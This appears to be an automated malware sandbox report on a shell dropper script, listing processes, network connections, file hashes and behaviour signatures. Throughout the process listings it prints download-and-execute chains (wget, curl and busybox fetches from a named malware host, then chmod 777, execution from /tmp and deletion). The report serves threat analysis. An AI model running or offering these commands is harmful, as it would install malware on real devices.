[wget http://conn.masjesu.zip/bins/Mj4CQad7zY1H1sbSpX7Y5WyRB3PM5DGsAd]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/Mj4CQad7zY1H1sbSpX7Y5WyRB3PM5DGsAd]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/Mj4CQad7zY1H1sbSpX7Y5WyRB3PM5DGsAd]
/bin/chmod
[chmod 777 Mj4CQad7zY1H1sbSpX7Y5WyRB3PM5DGsAd]
/tmp/Mj4CQad7zY1H1sbSpX7Y5WyRB3PM5DGsAd
[./Mj4CQad7zY1H1sbSpX7Y5WyRB3PM5DGsAd]
/bin/rm
[rm Mj4CQad7zY1H1sbSpX7Y5WyRB3PM5DGsAd]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/VX9fro4oT4L7IYRexFAdGGO49L2O5hYKGh]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/VX9fro4oT4L7IYRexFAdGGO49L2O5hYKGh]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/VX9fro4oT4L7IYRexFAdGGO49L2O5hYKGh]
/bin/chmod
[chmod 777 VX9fro4oT4L7IYRexFAdGGO49L2O5hYKGh]
/tmp/VX9fro4oT4L7IYRexFAdGGO49L2O5hYKGh
[./VX9fro4oT4L7IYRexFAdGGO49L2O5hYKGh]
/bin/rm
[rm VX9fro4oT4L7IYRexFAdGGO49L2O5hYKGh]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/tEWxeFqWYJ5FMR388Hg8Iu6prXLDx0q0wv]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/tEWxeFqWYJ5FMR388Hg8Iu6prXLDx0q0wv]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/tEWxeFqWYJ5FMR388Hg8Iu6prXLDx0q0wv]
/bin/chmod
[chmod 777 tEWxeFqWYJ5FMR388Hg8Iu6prXLDx0q0wv]
/tmp/tEWxeFqWYJ5FMR388Hg8Iu6prXLDx0q0wv
[./tEWxeFqWYJ5FMR388Hg8Iu6prXLDx0q0wv]
/bin/rm
[rm tEWxeFqWYJ5FMR388Hg8Iu6prXLDx0q0wv]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/Jp5SOg0AxAyAo9fewo3pjICTViRj1YA9nq]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/Jp5SOg0AxAyAo9fewo3pjICTViRj1YA9nq]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/Jp5SOg0AxAyAo9fewo3pjICTViRj1YA9nq]
/bin/chmod
[chmod 777 Jp5SOg0AxAyAo9fewo3pjICTViRj1YA9nq]
/tmp/Jp5SOg0AxAyAo9fewo3pjICTViRj1YA9nq
[./Jp5SOg0AxAyAo9fewo3pjICTViRj1YA9nq]
/bin/rm
[rm Jp5SOg0AxAyAo9fewo3pjICTViRj1YA9nq]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/dHObstG7LU99jTkh5GsOz0rwUn9AAvcPKl]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/dHObstG7LU99jTkh5GsOz0rwUn9AAvcPKl]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/dHObstG7LU99jTkh5GsOz0rwUn9AAvcPKl]
/bin/chmod
[chmod 777 dHObstG7LU99jTkh5GsOz0rwUn9AAvcPKl]
/tmp/dHObstG7LU99jTkh5GsOz0rwUn9AAvcPKl
[./dHObstG7LU99jTkh5GsOz0rwUn9AAvcPKl]
/bin/rm
[rm dHObstG7LU99jTkh5GsOz0rwUn9AAvcPKl]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/mUzHIm52QGre6l6z7xbx9FU7x1KDQ0Dfjq]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/mUzHIm52QGre6l6z7xbx9FU7x1KDQ0Dfjq]
Network
| Country | Destination | Domain | Proto |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
Files
/tmp/ejzagRNC2cjRViKQlfgqN3KtKOvI1VDV6N
| MD5 | 7689ca8c5bc85cf6b78ef89323d4df6a |
| SHA1 | a1392ec3b571b3de167f0b9a5dadab4f14a2db76 |
| SHA256 | 17dcc5c5df80bfe98d30dd8eb7e0de5875d0e4560a0f23e5acb0b13ef1a1a3c5 |
| SHA512 | 40f543b232d42b9b7796382c15de33e682111685ad7ae87be455d0d8d3e48866dfc137f4555b8bc6bf03ac5dde233c8f20e8c4f220c05c71892de0ce14691471 |
/tmp/ElSJuxHfA1jBeBrn6kgQwvVjimNZyu8xYX
| MD5 | 998368d7c95ea4293237f2320546e440 |
| SHA1 | 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4 |
| SHA256 | 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736 |
| SHA512 | 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97 |
Analysis: behavioral4
Detonation Overview
Submitted
2024-10-29 02:53
Reported
2024-10-29 02:55
Platform
debian9-mipsel-20240611-en
Max time kernel
124s
Max time network
148s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/ejzagRNC2cjRViKQlfgqN3KtKOvI1VDV6N | /tmp/ejzagRNC2cjRViKQlfgqN3KtKOvI1VDV6N | N/A |
| N/A | /tmp/MbziRlKzuJrlmakeEok1UpeTAzZxNiRx7J | /tmp/MbziRlKzuJrlmakeEok1UpeTAzZxNiRx7J | N/A |
| N/A | /tmp/ElSJuxHfA1jBeBrn6kgQwvVjimNZyu8xYX | /tmp/ElSJuxHfA1jBeBrn6kgQwvVjimNZyu8xYX | N/A |
| N/A | /tmp/lB4B5OKiANeDqdZEcNTfmwYIBKOLkuMTDg | /tmp/lB4B5OKiANeDqdZEcNTfmwYIBKOLkuMTDg | N/A |
| N/A | /tmp/dJIRIS3fIEsIe3gdZ4c8NtuTkyZUZ4RBww | /tmp/dJIRIS3fIEsIe3gdZ4c8NtuTkyZUZ4RBww | N/A |
| N/A | /tmp/Mj4CQad7zY1H1sbSpX7Y5WyRB3PM5DGsAd | /tmp/Mj4CQad7zY1H1sbSpX7Y5WyRB3PM5DGsAd | N/A |
| N/A | /tmp/VX9fro4oT4L7IYRexFAdGGO49L2O5hYKGh | /tmp/VX9fro4oT4L7IYRexFAdGGO49L2O5hYKGh | N/A |
| N/A | /tmp/tEWxeFqWYJ5FMR388Hg8Iu6prXLDx0q0wv | /tmp/tEWxeFqWYJ5FMR388Hg8Iu6prXLDx0q0wv | N/A |
| N/A | /tmp/mUzHIm52QGre6l6z7xbx9FU7x1KDQ0Dfjq | /tmp/mUzHIm52QGre6l6z7xbx9FU7x1KDQ0Dfjq | N/A |
| N/A | /tmp/Em9dlSBHXSJ1BhY8HH74CfelJWsKDX7b1Z | /tmp/Em9dlSBHXSJ1BhY8HH74CfelJWsKDX7b1Z | N/A |
| N/A | /tmp/H9QVWnuz04G6ntA4l4ZU12dEt8OZPed67o | /tmp/H9QVWnuz04G6ntA4l4ZU12dEt8OZPed67o | N/A |
| N/A | /tmp/MSKEgsSBQv7XOhgr3KTn15uFZBTGojSyZ8 | /tmp/MSKEgsSBQv7XOhgr3KTn15uFZBTGojSyZ8 | N/A |
| N/A | /tmp/Jp5SOg0AxAyAo9fewo3pjICTViRj1YA9nq | /tmp/Jp5SOg0AxAyAo9fewo3pjICTViRj1YA9nq | N/A |
| N/A | /tmp/dHObstG7LU99jTkh5GsOz0rwUn9AAvcPKl | /tmp/dHObstG7LU99jTkh5GsOz0rwUn9AAvcPKl | N/A |
| N/A | /tmp/ejzagRNC2cjRViKQlfgqN3KtKOvI1VDV6N | /tmp/ejzagRNC2cjRViKQlfgqN3KtKOvI1VDV6N | N/A |
| N/A | /tmp/MbziRlKzuJrlmakeEok1UpeTAzZxNiRx7J | /tmp/MbziRlKzuJrlmakeEok1UpeTAzZxNiRx7J | N/A |
| N/A | /tmp/ElSJuxHfA1jBeBrn6kgQwvVjimNZyu8xYX | /tmp/ElSJuxHfA1jBeBrn6kgQwvVjimNZyu8xYX | N/A |
| N/A | /tmp/lB4B5OKiANeDqdZEcNTfmwYIBKOLkuMTDg | /tmp/lB4B5OKiANeDqdZEcNTfmwYIBKOLkuMTDg | N/A |
| N/A | /tmp/dJIRIS3fIEsIe3gdZ4c8NtuTkyZUZ4RBww | /tmp/dJIRIS3fIEsIe3gdZ4c8NtuTkyZUZ4RBww | N/A |
| N/A | /tmp/Mj4CQad7zY1H1sbSpX7Y5WyRB3PM5DGsAd | /tmp/Mj4CQad7zY1H1sbSpX7Y5WyRB3PM5DGsAd | N/A |
| N/A | /tmp/VX9fro4oT4L7IYRexFAdGGO49L2O5hYKGh | /tmp/VX9fro4oT4L7IYRexFAdGGO49L2O5hYKGh | N/A |
| N/A | /tmp/tEWxeFqWYJ5FMR388Hg8Iu6prXLDx0q0wv | /tmp/tEWxeFqWYJ5FMR388Hg8Iu6prXLDx0q0wv | N/A |
| N/A | /tmp/Jp5SOg0AxAyAo9fewo3pjICTViRj1YA9nq | /tmp/Jp5SOg0AxAyAo9fewo3pjICTViRj1YA9nq | N/A |
| N/A | /tmp/dHObstG7LU99jTkh5GsOz0rwUn9AAvcPKl | /tmp/dHObstG7LU99jTkh5GsOz0rwUn9AAvcPKl | N/A |
| N/A | /tmp/mUzHIm52QGre6l6z7xbx9FU7x1KDQ0Dfjq | /tmp/mUzHIm52QGre6l6z7xbx9FU7x1KDQ0Dfjq | N/A |
| N/A | /tmp/Em9dlSBHXSJ1BhY8HH74CfelJWsKDX7b1Z | /tmp/Em9dlSBHXSJ1BhY8HH74CfelJWsKDX7b1Z | N/A |
| N/A | /tmp/H9QVWnuz04G6ntA4l4ZU12dEt8OZPed67o | /tmp/H9QVWnuz04G6ntA4l4ZU12dEt8OZPed67o | N/A |
| N/A | /tmp/MSKEgsSBQv7XOhgr3KTn15uFZBTGojSyZ8 | /tmp/MSKEgsSBQv7XOhgr3KTn15uFZBTGojSyZ8 | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/Em9dlSBHXSJ1BhY8HH74CfelJWsKDX7b1Z | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Jp5SOg0AxAyAo9fewo3pjICTViRj1YA9nq | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Jp5SOg0AxAyAo9fewo3pjICTViRj1YA9nq | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Em9dlSBHXSJ1BhY8HH74CfelJWsKDX7b1Z | /usr/bin/curl | N/A |
| File opened for modification | /tmp/MSKEgsSBQv7XOhgr3KTn15uFZBTGojSyZ8 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/ElSJuxHfA1jBeBrn6kgQwvVjimNZyu8xYX | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tEWxeFqWYJ5FMR388Hg8Iu6prXLDx0q0wv | /usr/bin/curl | N/A |
| File opened for modification | /tmp/MSKEgsSBQv7XOhgr3KTn15uFZBTGojSyZ8 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/dJIRIS3fIEsIe3gdZ4c8NtuTkyZUZ4RBww | /usr/bin/curl | N/A |
| File opened for modification | /tmp/mUzHIm52QGre6l6z7xbx9FU7x1KDQ0Dfjq | /usr/bin/curl | N/A |
| File opened for modification | /tmp/H9QVWnuz04G6ntA4l4ZU12dEt8OZPed67o | /usr/bin/curl | N/A |
| File opened for modification | /tmp/MbziRlKzuJrlmakeEok1UpeTAzZxNiRx7J | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Mj4CQad7zY1H1sbSpX7Y5WyRB3PM5DGsAd | /usr/bin/curl | N/A |
| File opened for modification | /tmp/ejzagRNC2cjRViKQlfgqN3KtKOvI1VDV6N | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Mj4CQad7zY1H1sbSpX7Y5WyRB3PM5DGsAd | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tEWxeFqWYJ5FMR388Hg8Iu6prXLDx0q0wv | /usr/bin/curl | N/A |
| File opened for modification | /tmp/dHObstG7LU99jTkh5GsOz0rwUn9AAvcPKl | /usr/bin/curl | N/A |
| File opened for modification | /tmp/ejzagRNC2cjRViKQlfgqN3KtKOvI1VDV6N | /usr/bin/curl | N/A |
| File opened for modification | /tmp/lB4B5OKiANeDqdZEcNTfmwYIBKOLkuMTDg | /usr/bin/curl | N/A |
| File opened for modification | /tmp/ElSJuxHfA1jBeBrn6kgQwvVjimNZyu8xYX | /usr/bin/curl | N/A |
| File opened for modification | /tmp/H9QVWnuz04G6ntA4l4ZU12dEt8OZPed67o | /usr/bin/curl | N/A |
| File opened for modification | /tmp/lB4B5OKiANeDqdZEcNTfmwYIBKOLkuMTDg | /usr/bin/curl | N/A |
| File opened for modification | /tmp/VX9fro4oT4L7IYRexFAdGGO49L2O5hYKGh | /usr/bin/curl | N/A |
| File opened for modification | /tmp/dHObstG7LU99jTkh5GsOz0rwUn9AAvcPKl | /usr/bin/curl | N/A |
| File opened for modification | /tmp/MbziRlKzuJrlmakeEok1UpeTAzZxNiRx7J | /usr/bin/curl | N/A |
| File opened for modification | /tmp/dJIRIS3fIEsIe3gdZ4c8NtuTkyZUZ4RBww | /usr/bin/curl | N/A |
| File opened for modification | /tmp/VX9fro4oT4L7IYRexFAdGGO49L2O5hYKGh | /usr/bin/curl | N/A |
| File opened for modification | /tmp/mUzHIm52QGre6l6z7xbx9FU7x1KDQ0Dfjq | /usr/bin/curl | N/A |
Processes
/tmp/c0bc234ffd2ae3085205f814f1f18a6acb1452e8cfc2509992e60aa0f134d653.sh
[/tmp/c0bc234ffd2ae3085205f814f1f18a6acb1452e8cfc2509992e60aa0f134d653.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/ejzagRNC2cjRViKQlfgqN3KtKOvI1VDV6N]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/ejzagRNC2cjRViKQlfgqN3KtKOvI1VDV6N]
/bin/busybox
